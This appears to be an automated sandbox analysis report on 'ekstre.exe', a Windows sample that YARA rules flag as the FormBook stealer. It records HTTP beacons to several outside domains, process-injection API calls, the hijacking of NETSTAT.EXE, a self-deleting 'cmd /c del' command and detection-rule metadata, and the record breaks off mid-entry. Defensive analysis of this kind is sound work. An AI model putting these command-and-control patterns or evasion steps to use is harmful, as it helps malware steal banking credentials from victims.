Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=CmkHYlvtWFyiY6x7wzgggV7o1XWqH1EIkW2vDHN+0HbYWyx2WNdLHwPWYAq7GV6cOSXz&-Z=6lfDx HTTP/1.1Host: www.crosswalkconsulting.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&-Z=6lfDx HTTP/1.1Host: www.textare.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=sfgefL3EX7tLrVmbrrvt2gRLjrdY9EgZIzRUFJ3eu0i+5BdWwZEHyNY8KODjs8HGUQbA HTTP/1.1Host: www.peterslawonline.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?-Z=6lfDx&5jbDpbb=1jOQ3Jr5eocDUv08KXQ/tvvmF58QYiHzcU4AjsguiQtOIJEdYj1yWSkOfJSnBsy7U62P HTTP/1.1Host: www.irestoreart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=4Lo61ZRTO0uvURH/h1aY/xwwIPd8h5yyY/H7In0LOtAqoGXoXBtvh8DjOZnAsSvGQgKa&7nY=sRhHpN HTTP/1.1Host: www.textare.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /mi94/?5jbDpbb=oUKF/a0VBYM/wUiPoEbZf2Cmkmjvp/vv1ZeFcEWnUAPVfAMIxMINRx/0nluyfFKvqa1+&7nY=sRhHpN HTTP/1.1Host: www.laxmi.digitalConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000002.00000002.5864084304.000000000A65C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d Author: unknown
Source: Process Memory Space: ekstre.exe PID: 6096, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: NETSTAT.EXE PID: 1708, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown

Source: ekstre.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.5841711739.00000000028C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.5842627078.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1211195080.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.5838086989.0000000000370000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.1274181140.0000000033DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.5864084304.000000000A65C000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_772cc62d os = windows, severity = x86, creation_date = 2022-05-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8343b5d02d74791ba2d5d52d19a759f761de2b5470d935000bc27ea6c0633f5, id = 772cc62d-345c-42d8-97ab-f67e447ddca4, last_modified = 2022-07-18
Source: Process Memory Space: ekstre.exe PID: 6096, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: Process Memory Space: NETSTAT.EXE PID: 1708, type: MEMORYSTR	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\ekstre.exe

Code function: 0_2_00403390 EntryPoint,SetErrorMode,GetVersionExA,GetVersionExA,GetVersionExA,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

0_2_00403390

Source: C:\Users\user\Desktop\ekstre.exe

File created: C:\Windows\Fonts\Dagvagts

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe	Code function: 0_2_6DE82288	0_2_6DE82288
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180445	1_2_34180445
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341ED480	1_2_341ED480
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3424A526	1_2_3424A526
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342375C6	1_2_342375C6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423F5C9	1_2_3423F5C9
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421D62C	1_2_3421D62C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419C600	1_2_3419C600
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422D646	1_2_3422D646
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A4670	1_2_341A4670
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180680	1_2_34180680
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423F6F6	1_2_3423F6F6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423A6C0	1_2_3423A6C0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F36EC	1_2_341F36EC
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417C6E0	1_2_3417C6E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34236757	1_2_34236757
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34182760	1_2_34182760
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418A760	1_2_3418A760
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422E076	1_2_3422E076
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B508C	1_2_341B508C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341700A0	1_2_341700A0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418B0D0	1_2_3418B0D0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_342370F1	1_2_342370F1
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416F113	1_2_3416F113
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421D130	1_2_3421D130
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3424010E	1_2_3424010E
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341C717A	1_2_341C717A
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341851C0	1_2_341851C0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419B1E0	1_2_3419B1E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423124C	1_2_3423124C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3416D2EC	1_2_3416D2EC
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418E310	1_2_3418E310
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423F330	1_2_3423F330
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34171380	1_2_34171380
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34170C12	1_2_34170C12
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418AC20	1_2_3418AC20
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FEC20	1_2_341FEC20
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423EC60	1_2_3423EC60
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34236C69	1_2_34236C69
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3422EC4C	1_2_3422EC4C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34183C60	1_2_34183C60
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34219C98	1_2_34219C98
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34198CDF	1_2_34198CDF
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34207CE8	1_2_34207CE8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3424ACEB	1_2_3424ACEB
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419FCE0	1_2_3419FCE0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423FD27	1_2_3423FD27
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3417AD00	1_2_3417AD00
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34237D4C	1_2_34237D4C
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34180D69	1_2_34180D69
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34192DB0	1_2_34192DB0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34189DD0	1_2_34189DD0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3421FDF4	1_2_3421FDF4
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341A0E50	1_2_341A0E50
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34220E6D	1_2_34220E6D
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341C2E48	1_2_341C2E48
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34230EAD	1_2_34230EAD
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34181EB2	1_2_34181EB2
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34239ED2	1_2_34239ED2
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34172EE8	1_2_34172EE8
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3418CF00	1_2_3418CF00
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423FF63	1_2_3423FF63
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341FFF40	1_2_341FFF40
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423EFBF	1_2_3423EFBF
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34231FC6	1_2_34231FC6
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34186FE0	1_2_34186FE0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341AE810	1_2_341AE810
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34220835	1_2_34220835
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34183800	1_2_34183800
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3423F872	1_2_3423F872
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_34189870	1_2_34189870
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_3419B870	1_2_3419B870
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341F5870	1_2_341F5870

Source: C:\Users\user\Desktop\ekstre.exe	Code function: String function: 3416B910 appears 207 times
Source: C:\Users\user\Desktop\ekstre.exe	Code function: String function: 341C7BE4 appears 72 times
Source: C:\Users\user\Desktop\ekstre.exe	Code function: String function: 341EE692 appears 76 times
Source: C:\Users\user\Desktop\ekstre.exe	Code function: String function: 341FEF10 appears 75 times

Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2C30 NtMapViewOfSection,LdrInitializeThunk,	1_2_341B2C30
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2C50 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_341B2C50
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2CF0 NtDelayExecution,LdrInitializeThunk,	1_2_341B2CF0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2D10 NtQuerySystemInformation,LdrInitializeThunk,	1_2_341B2D10
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2DA0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_341B2DA0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_341B2DC0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2E50 NtCreateSection,LdrInitializeThunk,	1_2_341B2E50
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2EB0 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_341B2EB0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2ED0 NtResumeThread,LdrInitializeThunk,	1_2_341B2ED0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2F00 NtCreateFile,LdrInitializeThunk,	1_2_341B2F00
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B29F0 NtReadFile,LdrInitializeThunk,	1_2_341B29F0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2A80 NtClose,LdrInitializeThunk,	1_2_341B2A80
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2B10 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_341B2B10
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2B90 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_341B2B90
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2BC0 NtQueryInformationToken,LdrInitializeThunk,	1_2_341B2BC0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B34E0 NtCreateMutant,	1_2_341B34E0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B4570 NtSuspendThread,	1_2_341B4570
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B4260 NtSetContextThread,	1_2_341B4260
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2C10 NtOpenProcess,	1_2_341B2C10
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B3C30 NtOpenProcessToken,	1_2_341B3C30
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2C20 NtSetInformationFile,	1_2_341B2C20
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B3C90 NtOpenThread,	1_2_341B3C90
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2CD0 NtEnumerateKey,	1_2_341B2CD0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2D50 NtWriteVirtualMemory,	1_2_341B2D50
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2E00 NtQueueApcThread,	1_2_341B2E00
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2E80 NtCreateProcessEx,	1_2_341B2E80
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2EC0 NtQuerySection,	1_2_341B2EC0
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2F30 NtOpenDirectoryObject,	1_2_341B2F30
Source: C:\Users\user\Desktop\ekstre.exe	Code function: 1_2_341B2FB0 NtSetValueKey,	1_2_341B2FB0

Source: ekstre.exe, 00000000.00000002.1117622927.0000000000791000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameMapiProxy.dll8 vs ekstre.exe
Source: ekstre.exe, 00000001.00000003.1061058941.0000000033F0D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ekstre.exe
Source: ekstre.exe, 00000001.00000002.1275559957.0000000034410000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ekstre.exe
Source: ekstre.exe, 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ekstre.exe
Source: ekstre.exe, 00000001.00000003.1065874723.00000000340C4000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs ekstre.exe
Source: ekstre.exe, 00000001.00000003.1209497067.0000000003F94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs ekstre.exe
Source: ekstre.exe, 00000001.00000002.1211482335.00000000000D0000.00000040.10000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamenetstat.exej% vs ekstre.exe

Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ekstre.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Section loaded: edgegdi.dll	Jump to behavior

Source: ekstre.exe	ReversingLabs: Detection: 29%
Source: ekstre.exe	Virustotal: Detection: 41%

Source: C:\Users\user\Desktop\ekstre.exe

File read: C:\Users\user\Desktop\ekstre.exe

Jump to behavior

Source: ekstre.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\ekstre.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\ekstre.exe C:\Users\user\Desktop\ekstre.exe
Source: C:\Users\user\Desktop\ekstre.exe	Process created: C:\Users\user\Desktop\ekstre.exe C:\Users\user\Desktop\ekstre.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ekstre.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\ekstre.exe	Process created: C:\Users\user\Desktop\ekstre.exe C:\Users\user\Desktop\ekstre.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE	Jump to behavior
Source: C:\Windows\SysWOW64\NETSTAT.EXE	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\ekstre.exe"	Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

0_2_00403390

Source: C:\Users\user\Desktop\ekstre.exe

File created: C:\Users\user\procharity

Jump to behavior

Source: C:\Users\user\Desktop\ekstre.exe

File created: C:\Users\user\AppData\Local\Temp\nsbCF77.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.evad.winEXE@520/19@25/14

Source: C:\Users\user\Desktop\ekstre.exe

